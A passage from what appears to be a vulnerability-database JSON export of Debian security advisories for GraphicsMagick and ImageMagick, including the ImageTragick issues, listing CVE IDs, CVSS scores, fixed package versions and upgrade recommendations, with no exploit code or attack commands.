"PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17912", "CVE-2017-17915"], "modified": "2018-01-08T13:31:31", "id": "DEBIAN:DLA-1231-1:8E55F", "href": "https://lists.debian.org/debian-lts-announce/2018/01/msg00005.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-29T04:06:42", "description": "Package : graphicsmagick\nVersion : 1.3.16-1.1+deb7u16\nCVE ID : CVE-2017-17498 CVE-2017-17500 CVE-2017-17501\n CVE-2017-17502 CVE-2017-17503 CVE-2017-17782\n CVE-2017-17912 CVE-2017-17915\nDebian Bug : 884905\n\nThe NSFocus Security Team discovered multiple security issues in\nGraphicsmagick, a collection of image processing tools. Several\nheap-based buffer over-reads may lead to a denial-of-service\n(application crash) or possibly have other unspecified impact when\nprocessing a crafted file.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n1.3.16-1.1+deb7u16.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-08T13:31:31", "type": "debian", "title": "[SECURITY] [DLA 1231-1] 
graphicsmagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17912", "CVE-2017-17915"], "modified": "2018-01-08T13:31:31", "id": "DEBIAN:DLA-1231-1:C59AA", "href": "https://lists.debian.org/debian-lts-announce/2018/01/msg00005.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T04:24:12", "description": "Package : graphicsmagick\nVersion : 1.3.16-1.1+deb7u4\nCVE ID : CVE-2016-7446 CVE-2016-7447 CVE-2016-7449 CVE-2016-7800\nDebian Bug : \n\n\nVarious security issues were found and fixed in graphicsmagick in Debian\nwheezy LTS.\n\nCVE-2016-7446\n\n Heap buffer overflow issue in MVG/SVG rendering.\n\nCVE-2016-7447\n\n Heap overflow of the EscapeParenthesis() function\n\nCVE-2016-7449\n\n TIFF related problems due to use of strlcpy use.\n\nCVE-2016-7800\n\n Fix unsigned underflow leading to heap overflow when\n parsing 8BIM chunk.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n1.3.16-1.1+deb7u4.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n- -- \nBrian May <bam@debian.org>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 
"scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-11T06:40:00", "type": "debian", "title": "[SECURITY] [DLA 651-1] graphicsmagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7446", "CVE-2016-7447", "CVE-2016-7449", "CVE-2016-7800"], "modified": "2016-10-11T06:40:00", "id": "DEBIAN:DLA-651-1:36F8B", "href": "https://lists.debian.org/debian-lts-announce/2016/10/msg00007.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T13:35:52", "description": "Package : graphicsmagick\nVersion : 1.3.16-1.1+deb7u9\nCVE ID : CVE-2017-12935 CVE-2017-12936 CVE-2017-12937 CVE-2017-13063\n CVE-2017-13064 CVE-2017-13065 CVE-2017-13776 CVE-2017-13777\n\n\nCVE-2017-13776\nCVE-2017-13777\n denial of service issue in ReadXBMImage()\n\nCVE-2017-12935\n The ReadMNGImage function in coders/png.c mishandles large MNG\n images, leading to an invalid memory read in the\n SetImageColorCallBack function in magick/image.c.\n\nCVE-2017-12936\n The ReadWMFImage function in coders/wmf.c has a use-after-free\n issue for data associated with exception reporting.\n\nCVE-2017-12937\n The ReadSUNImage function in coders/sun.c has a colormap\n heap-based buffer 
over-read.\n\nCVE-2017-13063\nCVE-2017-13064\n heap-based buffer overflow vulnerability in the function\n GetStyleTokens in coders/svg.c\n\nCVE-2017-13065\n NULL pointer dereference vulnerability in the function\n SVGStartElement in coders/svg.c\n\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n1.3.16-1.1+deb7u9.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-31T20:21:30", "type": "debian", "title": "[SECURITY] [DLA 1082-1] graphicsmagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12935", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13776", "CVE-2017-13777"], "modified": "2017-08-31T20:21:30", "id": "DEBIAN:DLA-1082-1:FA56E", "href": "https://lists.debian.org/debian-lts-announce/2017/08/msg00034.html", "cvss": {"score": 7.1, "vector": 
"AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-02-18T23:58:55", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4321-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nOctober 16, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : graphicsmagick\nCVE ID : CVE-2017-10794 CVE-2017-10799 CVE-2017-10800 CVE-2017-11102 \n CVE-2017-11139 CVE-2017-11140 CVE-2017-11403 CVE-2017-11636 \n CVE-2017-11637 CVE-2017-11638 CVE-2017-11641 CVE-2017-11642 \n CVE-2017-11643 CVE-2017-11722 CVE-2017-12935 CVE-2017-12936 \n CVE-2017-12937 CVE-2017-13063 CVE-2017-13064 CVE-2017-13065 \n CVE-2017-13134 CVE-2017-13737 CVE-2017-13775 CVE-2017-13776 \n CVE-2017-13777 CVE-2017-14314 CVE-2017-14504 CVE-2017-14733 \n CVE-2017-14994 CVE-2017-14997 CVE-2017-15238 CVE-2017-15277 \n CVE-2017-15930 CVE-2017-16352 CVE-2017-16353 CVE-2017-16545 \n CVE-2017-16547 CVE-2017-16669 CVE-2017-17498 CVE-2017-17500 \n CVE-2017-17501 CVE-2017-17502 CVE-2017-17503 CVE-2017-17782 \n CVE-2017-17783 CVE-2017-17912 CVE-2017-17913 CVE-2017-17915 \n CVE-2017-18219 CVE-2017-18220 CVE-2017-18229 CVE-2017-18230 \n CVE-2017-18231 CVE-2018-5685 CVE-2018-6799 CVE-2018-9018\n\nSeveral vulnerabilities have been discovered in GraphicsMagick, a set of\ncommand-line applications to manipulate image files, which could result\nin denial of service or the execution of arbitrary code if malformed\nimage files are processed.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 1.3.30+hg15796-1~deb9u1.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFor the detailed security status of graphicsmagick please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/graphicsmagick\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and 
frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-16T21:57:57", "type": "debian", "title": "[SECURITY] [DSA 4321-1] graphicsmagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10794", "CVE-2017-10799", "CVE-2017-10800", "CVE-2017-11102", "CVE-2017-11139", "CVE-2017-11140", "CVE-2017-11403", "CVE-2017-11636", "CVE-2017-11637", "CVE-2017-11638", "CVE-2017-11641", "CVE-2017-11642", "CVE-2017-11643", "CVE-2017-11722", "CVE-2017-12935", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-13737", "CVE-2017-13775", "CVE-2017-13776", "CVE-2017-13777", "CVE-2017-14314", "CVE-2017-14504", "CVE-2017-14733", "CVE-2017-14994", "CVE-2017-14997", "CVE-2017-15238", "CVE-2017-15277", "CVE-2017-15930", "CVE-2017-16352", "CVE-2017-16353", "CVE-2017-16545", "CVE-2017-16547", "CVE-2017-16669", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", 
"CVE-2017-17782", "CVE-2017-17783", "CVE-2017-17912", "CVE-2017-17913", "CVE-2017-17915", "CVE-2017-18219", "CVE-2017-18220", "CVE-2017-18229", "CVE-2017-18230", "CVE-2017-18231", "CVE-2018-5685", "CVE-2018-6799", "CVE-2018-9018"], "modified": "2018-10-16T21:57:57", "id": "DEBIAN:DSA-4321-1:D5514", "href": "https://lists.debian.org/debian-security-announce/2018/msg00252.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-29T06:40:24", "description": "Package : imagemagick\nVersion : 8:6.7.7.10-5+deb7u5\nCVE ID : CVE-2016-3714 CVE-2016-3715 CVE-2016-3716 CVE-2016-3717 \n CVE-2016-3718\nDebian Bug : 823542\n\nNikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code (CVE-2016-3714), make\nHTTP GET or FTP requests (CVE-2016-3718), or delete (CVE-2016-3715),\nmove (CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick/policy.xml file. 
In\naddition, we introduce extra preventions, including some sanitization\nfor input filenames in http/https delegates, the full removal of\nPLT/Gnuplot decoder, and the need of explicit reference in the filename\nfor the insecure coders.\n\nFor the wheezy, these problems have been fixed in version\n8:6.7.7.10-5+deb7u5.\n\nWe recommend that you upgrade your imagemagick packages.\n- -- \nBrian May <bam@debian.org>", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-23T02:34:38", "type": "debian", "title": "[SECURITY] [DLA 486-1] imagemagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-23T02:34:38", "id": "DEBIAN:DLA-486-1:42FF7", "href": "https://lists.debian.org/debian-lts-announce/2016/05/msg00039.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-26T01:24:29", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3580-1 
security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nMay 16, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : imagemagick\nCVE ID : CVE-2016-3714 CVE-2016-3715 CVE-2016-3716 CVE-2016-3717 \n CVE-2016-3718\nDebian Bug : 823542\n\nNikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code (CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718), or delete (CVE-2016-3715), move\n(CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. 
In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full removal of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 8:6.8.9.9-5+deb8u2.\n\nWe recommend that you upgrade your imagemagick packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-16T17:37:08", "type": "debian", "title": "[SECURITY] [DSA 3580-1] imagemagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-16T17:37:08", "id": "DEBIAN:DSA-3580-1:70B04", "href": "https://lists.debian.org/debian-security-announce/2016/msg00157.html", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T22:14:51", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3580-1 security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nMay 16, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : imagemagick\nCVE ID : CVE-2016-3714 CVE-2016-3715 CVE-2016-3716 CVE-2016-3717 \n CVE-2016-3718\nDebian Bug : 823542\n\nNikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code (CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718), or delete (CVE-2016-3715), move\n(CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. 
In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full removal of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 8:6.8.9.9-5+deb8u2.\n\nWe recommend that you upgrade your imagemagick packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-16T17:37:08", "type": "debian", "title": "[SECURITY] [DSA 3580-1] imagemagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-16T17:37:08", "id": "DEBIAN:DSA-3580-1:5A0E9", "href": "https://lists.debian.org/debian-security-announce/2016/msg00157.html", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-10T16:54:40", "description": "Version : 1.3.16-1.1+deb7u1\nCVE ID : CVE-2015-8808 CVE-2016-2317 CVE-2016-2318\n\t\t CVE-2016-3714 CVE-2016-3715 CVE-2016-3716\n CVE-2016-3717 CVE-2016-3718\nDebian Bug : 814732\n\nSeveral security vulnerabilities were discovered in graphicsmagick a\ntool to manipulate image files.\n\nGraphicsMagick is a fork of ImageMagick and also affected by\nvulnerabilities collectively known as ImageTragick, that are the\nconsequence of lack of sanitization of untrusted input. An attacker\nwith control on the image input could, with the privileges of the user\nrunning the application, execute code (CVE-2016-3714), make HTTP GET\nor FTP requests (CVE-2016-3718), or delete (CVE-2016-3715), move\n(CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nTo address these concerns the following changes have been made:\n\n1. Remove automatic detection/execution of MVG based on file header or\n file extension.\n\n2. Remove the ability to cause an input file to be deleted based on a\n filename specification.\n\n3. Improve the safety of delegates.mgk by removing gnuplot support,\n removing manual page support, and by adding -dSAFER to all\n ghostscript invocations.\n\n4. Sanity check the MVG image primitive filename argument to assure\n that "magick:" prefix strings will not be interpreted. Please note\n that this patch will break intentional uses of magick prefix\n strings in MVG and so some MVG scripts may fail. 
We will search\n for a more flexible solution.\n\nIn addition the following issues have been fixed:\n\nCVE-2015-8808\n Assure that GIF decoder does not use uninitialized data and cause an\n out-of-bound read.\n\nCVE-2016-2317 and CVE-2016-2318\n Vulnerabilities that allow to read or write outside memory bounds\n (heap, stack) as well as some null-pointer dereferences to cause a\n denial of service when parsing SVG files.\n\nFor Debian 7 \"Wheezy\", these problems have been fixed in version\n1.3.16-1.1+deb7u1.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-21T18:51:57", "type": "debian", "title": "[SECURITY] [DLA 484-1] graphicsmagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8808", "CVE-2016-2317", "CVE-2016-2318", "CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": 
"2016-05-21T18:51:57", "id": "DEBIAN:DLA-484-1:5CC12", "href": "https://lists.debian.org/debian-lts-announce/2016/05/msg00037.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-22T13:25:16", "description": "Package : graphicsmagick\nVersion : 1.3.16-1.1+deb7u14\nCVE ID : CVE-2017-16669\n\n\nA remote denial of service vulnerability has been discovered in\ngraphicsmagick, a collection of image processing tools and associated\nlibraries.\n\nA specially crafted file can be used to produce a heap-based buffer\noverflow and application crash by exploiting a defect in the\nAcquireCacheNexus function in magick/pixel_cache.c.\n\nFor Debian 7 \"Wheezy\", these problems have been fixed in version\n1.3.16-1.1+deb7u14.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNote: The previous graphicsmagick package inadvertently introduced a\ndependency on liblcms2-2. This version of the package returns to using\nliblcms1. If your system does not otherwise require liblcms2-2, you\nmay want to consider removing it following the graphicsmagick upgrade.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\nAttachment:\nsignature.asc\nDescription: PGP signature\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-10T20:29:43", "type": "debian", "title": "[SECURITY] [DLA 1168-1] graphicsmagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": 
false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16669"], "modified": "2017-11-10T20:29:43", "id": "DEBIAN:DLA-1168-1:C7018", "href": "https://lists.debian.org/debian-lts-announce/2017/11/msg00013.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-01-29T20:09:22", "description": "Various security issues were discovered in Graphicsmagick, a collection\nof image processing tools. Heap-based buffer overflows or overreads may\nlead to a denial of service or disclosure of in-memory information or\nother unspecified impact by processing a malformed image file.", "cvss3": {}, "published": "2018-07-10T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for graphicsmagick (DLA-1401-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13063", "CVE-2017-17915", "CVE-2017-17502", "CVE-2017-17498", "CVE-2017-14314", "CVE-2017-11636", "CVE-2017-17782", "CVE-2016-3716", "CVE-2017-17503", "CVE-2017-11643", "CVE-2016-5241", "CVE-2016-7447", "CVE-2017-17500", "CVE-2016-3718", "CVE-2017-13065", "CVE-2017-13134", "CVE-2016-7448", "CVE-2016-3717", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-14733", "CVE-2017-12937", "CVE-2017-17501", "CVE-2017-13064", "CVE-2017-17912", "CVE-2016-7446", "CVE-2016-7449"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891401", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891401", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the 
